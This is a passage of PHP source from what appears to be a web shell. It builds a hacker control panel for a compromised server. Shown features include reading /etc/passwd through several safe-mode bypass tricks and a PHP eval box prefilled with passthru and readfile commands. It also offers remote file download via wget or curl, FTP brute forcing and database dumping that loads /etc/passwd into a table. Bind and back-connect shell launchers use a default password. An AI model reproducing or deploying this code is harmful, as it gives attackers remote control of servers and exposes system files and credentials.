2647echo $fs.$table_up1.div_title($lang[$language.'_text57'],'id4').$table_up2.div('id4').$ts;
2648echo sr(15,"<b>".$lang[$language.'_text58'].$arrow."</b>",in('text','mk_name',54,(!empty($_POST['mk_name'])?($_POST['mk_name']):(""))).ws(4)."<select name=action><option value=create>".$lang[$language.'_text65']."</option><option value=delete>".$lang[$language.'_text66']."</option></select>".ws(3)."<select name=what><option value=file>".$lang[$language.'_text59']."</option><option value=dir>".$lang[$language.'_text60']."</option></select>".in('hidden','cmd',0,'mk').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt13']));
2649echo $te.'</div>'.$table_end1.$fe;
2650echo $fs.$table_up1.div_title($lang[$language.'_text67'],'id5').$table_up2.div('id5').$ts;
2651echo sr(15,"<b>".$lang[$language.'_text68'].$arrow."</b>","<select name=what><option value=mod>CHMOD</option><option value=own>CHOWN</option><option value=grp>CHGRP</option></select>".ws(2)."<b>".$lang[$language.'_text69'].$arrow."</b>".ws(2).in('text','param1',40,(($_POST['param1'])?($_POST['param1']):(""))).ws(2)."<b>".$lang[$language.'_text70'].$arrow."</b>".ws(2).in('text','param2 title="'.$lang[$language.'_text71'].'"',26,(($_POST['param2'])?($_POST['param2']):("0755"))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
2652echo $te.'</div>'.$table_end1.$fe;
2653}
2654echo $fs.$table_up1.div_title($lang[$language.'_text42'],'id3').$table_up2.div('id3').$ts;
2655echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','e_name',85,$dir).in('hidden','cmd',0,'edit_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt11']));
2656echo $te.'</div>'.$table_end1.$fe;
2657echo $fs.$table_up1.div_title($lang[$language.'_text207'],'id207').$table_up2.div('id207').$ts;
2658echo sr(15,"<b>".$lang[$language.'_text206'].$arrow."</b>",in('text','glob',85,'/etc/').in('hidden','cmd',0,'glob').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7']));
2659echo $te.'</div>'.$table_end1.$fe;
2660echo $fs.$table_up1.div_title($lang[$language.'_text209'],'id209').$table_up2.div('id209').$ts;
2661echo sr(15,"<b>".$lang[$language.'_text206'].$arrow."</b>",in('text','root',85,'/etc/').in('hidden','cmd',0,'root').in
2662('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7']));
2663echo $te.'</div>'.$table_end1.$fe;
2664echo $fs.$table_up1.div_title($lang[$language.'_text200'],'id3').$table_up2.div('id3').$ts;
2665echo sr(15,"<b>".$lang[$language.'_text202'].$arrow."</b>",in('text','snn',85,'/etc/passwd').in('hidden','cmd',0,'copy').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7']));
2666echo $te.'</div>'.$table_end1.$fe;
2667echo $fs.$table_up1.div_title($lang[$language.'_text203'],'id411').$table_up2.div('id411').$ts;
2668echo sr(15,"<b>".$lang[$language.'_text202'].$arrow."</b>",in('text','ini_restore',85,'/etc/passwd').in('hidden','cmd',0,'ini_restore').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7']));
2669echo $te.'</div>'.$table_end1.$fe;
2670echo $fs.$table_up1.div_title($lang[$language.'_text125'],'id2900').$table_up2.div('id2900').$ts;
2671echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test19',85,'/etc/passwd').in('hidden','cmd',0,'test19').in
2672('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
2673echo $te.'</div>'.$table_end1.$fe;
2674echo $fs.$table_up1.div_title($lang[$language.'_text127'],'id2901').$table_up2.div('id2901').$ts;
2675echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','file',85,'/etc/passwd').in
2676('hidden','cmd',0,'file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
2677echo $te.'</div>'.$table_end2.$fe;
2678echo $table_up1.div_title($lang[$language.'_text131'],'id2902').$table_up2.div('id2902').$ts."<tr>".$fs."<td valign=top width=50%>".$ts;
2679echo "<font face=tahoma size=-2><b><div align=center id='n'>Read File</div></b></font>";
2680echo sr(25,"<b>File :".$arrow."</b>",in('text','file1',40,(!empty($_POST['file1']))?($_POST['file1']):("/etc/passwd")).in('submit','submit',2,"Read File"));
2681function rsg_read()
2682 {
2683 $test="";
2684 $temp=tempnam($test, "cx");
2685 $file1=$_POST['file1'];
2686 $get=htmlspecialchars($file1);
2687 echo "<center><br><b><font size=2>Trying To Get File <font color=red><b>$get</b></font><br>";
2688 if(copy("compress.zlib://".$file1, $temp)){
2689 $fichier = fopen($temp, "r");
2690 $action = fread($fichier, filesize($temp));
2691 fclose($fichier);
2692 $source=htmlspecialchars($action);
2693echo "<div align=\"center\"><b><font size=2><br><font color=\"red\"><textarea name=report cols=60 rows=10>$source</textarea><br><b><br>Found <b><font size=2>$get</font></b>";
2694 unlink($temp);
2695 } else {
2696 die("<b><font size=2><CENTER>Sorry... File
2697 <font color=red><B>".htmlspecialchars($file1)."</B></font> dosen't exists or you don't have
2698 access.</CENTER></FONT>");
2699 }
2700 echo "</div>";
2701 }
2702if(isset($_POST['file1']))
2703{
2704rsg_read();
2705}
2706echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts;
2707echo "<font face=tahoma size=-2><b><div align=center id='n'>View Dir</div></b></font>";
2708echo sr(20,"<b>Dir :".$arrow."</b>",in('text','directory',40,(!empty($_POST['directory']))?($_POST['directory']):("/etc")).in('submit','submit',2,'View'));
2709function rsg_glob()
2710{
2711$chemin=$_POST['directory'];
2712$files = glob("$chemin*");
2713echo "<center><b><font size=2>Trying To List Folder <font color=red><b>$chemin</b></font><br>";
2714echo "<textarea cols=60 rows=10>";
2715foreach ($files as $filename) {
2716 echo "$filename\n";
2717 }echo "</textarea></center>";
2718 }
2719if(isset($_POST['directory']))
2720{
2721rsg_glob();
2722}
2723echo $te."</td>".$fe."</tr></div></table>";
2724echo $fs.$table_up1.div_title($lang[$language.'_text210'],'id210').$table_up2.div('id210').$ts;
2725echo "<table class=table1 width=100% align=center>";
2726echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','zend',85,(!empty($_POST['zend'])
2727?($_POST['zend']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'zend').ws(4).in
2728('submit','submit',0,$lang[$language.'_butt8']));
2729echo $te.'</div>'.$table_end1.$fe;
2730if(extension_loaded("ionCube Loader"))
2731{
2732echo $fs.$table_up1.div_title($lang[$language.'_text230'],'id230').$table_up2.div('id230').$ts;
2733echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test14_cmd',96,(!empty($_POST['test14_cmd'])?($_POST['test14_cmd']):(''))).ws(4).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test14').in('submit','submit',0,$lang[$language.'_butt8']));
2734echo $te.'</div>'.$table_end1.$fe;
2735}
2736if($unix&&extension_loaded("win32std"))
2737{
2738echo $fs.$table_up1.div_title($lang[$language.'_text231'],'id231').$table_up2.div('id231').$ts;
2739echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test15_cmd',96,(!empty($_POST['test15_cmd'])?($_POST['test15_cmd']):('dir'))).ws(4).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test15').in('submit','submit',0,$lang[$language.'_butt8']));
2740echo $te.'</div>'.$table_end1.$fe;
2741}
2742if($unix&&extension_loaded("win32service"))
2743{
2744echo $fs.$table_up1.div_title($lang[$language.'_text232'],'id232').$table_up2.div('id232').$ts;
2745echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test16_cmd',96,(!empty($_POST['test16_cmd'])?($_POST['test16_cmd']):('dir'))).ws(4).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test16').in('submit','submit',0,$lang[$language.'_butt8']));
2746echo $te.'</div>'.$table_end1.$fe;
2747}
2748if($unix&&extension_loaded("ffi"))
2749{
2750echo $fs.$table_up1.div_title($lang[$language.'_text132'],'id35').$table_up2.div('id234').$ts;
2751echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test18_cmd',96,(!empty($_POST['test18_cmd'])?($_POST['test18_cmd']):('dir'))).ws(4).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test18').in('submit','submit',0,$lang[$language.'_butt8']));
2752echo $te.'</div>'.$table_end1.$fe;
2753}
2754$aliases2 = '';
2755foreach ($aliases as $alias_name=>$alias_cmd)
2756 {
2757 $aliases2 .= "<option>$alias_name</option>";
2758 }
2759echo $fs.$table_up1.div_title($lang[$language.'_text7'],'id6').$table_up2.div('id6').$ts;
2760echo sr(15,"<b>".ws(9).$lang[$language.'_text8'].$arrow.ws(4)."</b>","<select name=alias>".$aliases2."</select>".in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
2761echo $te.'</div>'.$table_end1.$fe;
2762echo $fs.$table_up1.div_title($lang[$language.'_text54'],'id7').$table_up2.div('id7').$ts;
2763echo sr(15,"<b>".$lang[$language.'_text52'].$arrow."</b>",in('text','s_text',85,'').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
2764echo sr(15,"<b>".$lang[$language.'_text53'].$arrow."</b>",in('text','s_dir',85,$dir)." * ");
2765echo sr(15,"<b>".$lang[$language.'_text55'].$arrow."</b>",in('checkbox','m id=m',0,'1').in('text','s_mask',82,'.php;.asp;.aspx;.cfm')."*".in('hidden','cmd',0,'search_text').in('hidden','dir',0,$dir));
2766echo $te.'</div>'.$table_end1.$fe;
2767if($curl_on)
2768{
2769echo $fs.$table_up1.div_title($lang[$language.'_text33'],'id10').$table_up2.div('id10').$ts;
2770echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test1_file',85,(!empty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test1').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
2771echo $te.'</div>'.$table_end1.$fe;
2772echo $fs.$table_up1.div_title($lang[$language.'_text300'],'id3').$table_up2.div('id3').$ts;
2773echo sr(15,"<b>".$lang[$language.'_text202'].$arrow."</b>",in('text','ly0kha',85,'/etc/passwd').in('hidden','cmd',0,'cURL').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7']));
2774echo $te.'</div>'.$table_end1.$fe;
2775}
2776if($mssql_on)
2777{
2778echo $fs.$table_up1.div_title($lang[$language.'_text85'],'id13').$table_up2.div('id13').$ts;
2779echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test4_md',15,(!empty($_POST['test4_md'])?($_POST['test4_md']):("master"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test4_ml',15,(!empty($_POST['test4_ml'])?($_POST['test4_ml']):("sa"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test4_mp',15,(!empty($_POST['test4_mp'])?($_POST['test4_mp']):(""))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test4_port',15,(!empty($_POST['test4_port'])?($_POST['test4_port']):("1433"))));
2780echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test4_file',96,(!empty($_POST['test4_file'])?($_POST['test4_file']):("dir"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test4').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
2781echo $te.'</div>'.$table_end1.$fe;
2782}
2783echo $fs.$table_up1.div_title($lang[$language.'_text32'],'id9').$table_up2.$font;
2784echo "<div align=center>".div('id9')."<textarea name=php_eval cols=120 rows=5>";
2785echo (!empty($_POST['php_eval'])?($_POST['php_eval']):("/* delete script */\r\nunlink(\"thesunofvn.php\");\r\nreadfile(\"/etc/passwd\");\r\necho file_get_contents(\"/etc/passwd\");\r\npassthru(\"ln -s /etc/passwd sun.txt\");"));
2786echo "</textarea>";
2787echo in('hidden','dir',0,$dir).in('hidden','cmd',0,'php_eval');
2788echo "<br>".ws(1).in('submit','submit',0,$lang[$language.'_butt1']);
2789echo "</div></div></font>";
2790echo $table_end1.$fe;
2791{
2792echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
2793echo $table_up1.div_title($lang[$language.'_text5'],'id14').$table_up2.div('id14').$ts;
2794echo "<tr><td valign=top width=50%>".$ts;
2795echo sr(10,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile0',70,''));
2796echo sr(10,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile1',70,''));
2797echo sr(10,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile2',70,''));
2798echo $te."</td><td valign=top width=50%>".$ts;
2799echo sr(10,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile3',70,''));
2800echo sr(10,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile4',70,''));
2801echo sr(10,'',in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
2802echo $te."</td></tr>";
2803echo $te.'</div>'.$table_end1.$fe;
2804}
2805if(!$safe_mode&&$unix){
2806echo $fs.$table_up1.div_title($lang[$language.'_text15'],'id15').$table_up2.div('id15').$ts;
2807echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>","<select size=\"1\" name=\"with\"><option value=\"wget\">wget</option><option value=\"fetch\">fetch</option><option value=\"lynx\">lynx</option><option value=\"links\">links</option><option value=\"curl\">curl</option><option value=\"GET\">GET</option></select>".in('hidden','dir',0,$dir).ws(2)."<b>".$lang[$language.'_text17'].$arrow."</b>".in('text','rem_file',78,'http://'));
2808echo sr(15,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',105,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
2809echo $te.'</div>'.$table_end1.$fe;
2810}
2811echo $fs.$table_up1.div_title($lang[$language.'_text86'],'id16').$table_up2.div('id16').$ts;
2812echo sr(15,"<b>".$lang[$language.'_text59'].$arrow."</b>",in('text','d_name',85,$dir).in('hidden','cmd',0,'download_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt14']));
2813$arh = $lang[$language.'_text92'];
2814if(@function_exists('gzcompress')) { $arh .= in('radio','compress',0,'zip').' zip'; }
2815if(@function_exists('gzencode')) { $arh .= in('radio','compress',0,'gzip').' gzip'; }
2816if(@function_exists('bzcompress')) { $arh .= in('radio','compress',0,'bzip').' bzip'; }
2817echo sr(15,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none',1).' '.$arh);
2818echo $te.'</div>'.$table_end1.$fe;
2819if($unix && @function_exists("ftp_connect")){
2820echo $fs.$table_up1.div_title($lang[$language.'_text94'],'id18').$table_up2.div('id18').$ts;
2821echo sr(15,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',85,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):(""))).in('hidden','cmd',0,'ftp_brute').ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
2822echo sr(15,"","<font face=tahoma size=-2>".$lang[$language.'_text99']." ( <a href=".$_SERVER['PHP_SELF']."?users>".$lang[$language.'_text95']."</a> )</font>");
2823echo sr(15,"",in('checkbox','reverse id=reverse',0,'1').$lang[$language.'_text101']);
2824echo $te.'</div>'.$table_end1.$fe;
2825}
2826if($mysql_on||$mssql_on||$pg_on||$ora_on)
2827{
2828$select = '<select name=db>';
2829if($mysql_on) $select .= '<option>MySQL</option>';
2830if($mssql_on) $select .= '<option>MSSQL</option>';
2831if($pg_on) $select .= '<option>PostgreSQL</option>';
2832if($ora_on) $select .= '<option>Oracle</option>';
2833$select .= '</select>';
2834echo $table_up1.div_title($lang[$language.'_text82'],'id20').$table_up2.div('id20').$ts."<tr>".$fs."<td valign=top width=50%>".$ts;
2835echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text40']."</div></b></font>";
2836echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);
2837echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',15,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
2838echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):(""))).' <b>:</b> '.in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):(""))));
2839echo sr(35,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):(""))).' <b>.</b> '.in('text','mysql_tbl',15,(!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):(""))));
2840echo sr(35,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump')."<b>".$lang[$language.'_text41'].$arrow."</b>",in('checkbox','dif id=dif',0,'1').in('text','dif_name',31,(!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql"))));
2841echo sr(35,"",in('submit','submit',0,$lang[$language.'_butt9']));
2842echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts;
2843echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text83']."</div></b></font>";
2844echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);
2845echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',15,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
2846echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):(""))).' <b>:</b> '.in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):(""))));
2847echo sr(35,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):(""))));
2848echo sr(35,"<b>".$lang[$language.'_text84'].$arrow."</b>".in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_query'),"");
2849echo $te."<div align=center id='n'><textarea cols=75 rows=2 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\r\n#create table thesunofvn (mt varchar(1024));\r\n#load data local infile '/etc/passwd' into table thesunofvn;\r\n#update table set column='value what you want' where column=number;\r\n#insert table ('column','column') VALUES (number,'value');"))."</textarea><br>".in('submit','submit',0,$lang[$language.'_butt1'])."</div></td>".$fe."</tr></div></table>";
2850}
2851if($unix){
2852echo $table_up1.div_title($lang[$language.'_text81'],'id21').$table_up2.div('id21').$ts."<tr>".$fs."<td valign=top width=50%>".$ts;
2853echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text9']."</div></b></font>";
2854echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','port',15,'9999'));
2855echo sr(40,"<b>".$lang[$language.'_text11'].$arrow."</b>",in('text','bind_pass',15,'SnIpEr'));
2856echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
2857echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt3']));
2858echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts;
2859echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text12']."</div></b></font>";
2860echo sr(40,"<b>".$lang[$language.'_text13'].$arrow."</b>",in('text','ip',15,((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1"))));
2861echo sr(40,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','port',15,'80'));
2862echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
2863echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4']));
2864echo $te."</td>".$fe."</tr></div></table>";
2865}
2866if($safe_mode)
2867{
2868echo $table_up1.div_title($lang[$language.'_text211'],'id211').$table_up2.div('id211').$ts."<tr>".$fs."<td valign=top width=34%>".$ts;
2869echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text212']."</div></b></font>";
2870echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>",in('text','php_ini1',10,'php.ini').ws(4).in('submit','submit',0,$lang[$language.'_butt65']));
2871echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text213']."</div></b></font>";
2872echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>",in('text','htacces',10,'htaccess').ws(4).in('submit','submit',0,$lang[$language.'_butt65']));
2873echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text218']."</div></b></font>";
2874echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>",in('text','file_ini',10,'ini.php').ws(4).in('submit','submit',0,$lang[$language.'_butt65']));
2875echo $te.'</div>'.$table_end1.$fe;
2876}
2877echo '</table>'.$table_up3."</table>";
2878?>
2879<html><body><center>
2880<div align=center id='n'><font face="Tahoma" size=3 color=red><b>_____<a href="https://www.facebook.com/CNTTHK" target="_blank"><b>Khari Walkaz</b></a><br/></font></div>
2881<b><font face="Tahoma" size=-1 color="white">Generation time:</font></b> <font color="red" size=2><b><? echo round(getmicrotime()-starttime,4); ?></b></font> <font face="Tahoma" size=-1 color="white"><b>seconds</b></font>
2882</center></body></html>